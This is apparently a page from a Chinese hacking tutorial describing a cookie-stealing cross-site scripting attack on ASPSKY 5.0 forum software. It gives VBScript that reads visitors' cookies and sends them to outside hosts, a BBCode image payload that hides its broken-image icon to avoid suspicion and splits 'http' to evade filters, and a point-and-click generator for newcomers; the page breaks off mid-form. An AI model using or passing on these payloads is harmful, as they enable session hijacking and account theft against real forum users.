另控件的正常用法：
<script language=vbs>
dat=document.cookie
set http=createobject("Microsoft.XMLHTTP")
http.open "POST","http://www.chinansl.com/czy/get.asp?cook="&dat,false
http.send
tt=http.responsetext
msgbox tt
</script>

让代码更完美，现在COOKIE已经乖乖的在我们的邮箱里了，但是有一个小问题由于图片不
能正常的显示会是一个小叉，旁边还有按此在新窗口浏览图片的提示。。。这又难免会让人
生疑。

解决思路：
一个网页中的所有IMG元素通过document.imanges都能例举到，并且可以设置它们的大小，
当width=0时就相当于HIDDEN了.
通过比较元素的src属性的值是否含有"ript"就可以判断是不是我们的图片.
另外比较时大于符用>代替，0用0代替!

代码:
[IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0
then:aa.width=0:end if:next")[/IMG]

实际应用的代码：
[IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0 then:
aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://www.hd315.gov.cn/gcs/19qu/yan
qing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit=发送&message=""&dat,false:http.send")[/IMG]

//-------------------方便菜鸟使用：）
<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0 then:
aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://"&loc&"/usersms.asp?action=send&touser="&user&"&title=news&submit=发送&message=""&dat,false:http.send")
[/IMG]"
form1.area.value=str
end sub

</script>
<body>
<FONT SIZE=5 COLOR=RED>ASPSKY 5.0 0320 COOKI搜集器--CZY</FONT>
<form name=form1>
设置发送地址:<input type=text name=loc size=50><br>

上一页 [1] [2] [3] 下一页

上一篇:IE Object Data Remote Execution Vulnerability

下一篇:网吧十大漏洞曝光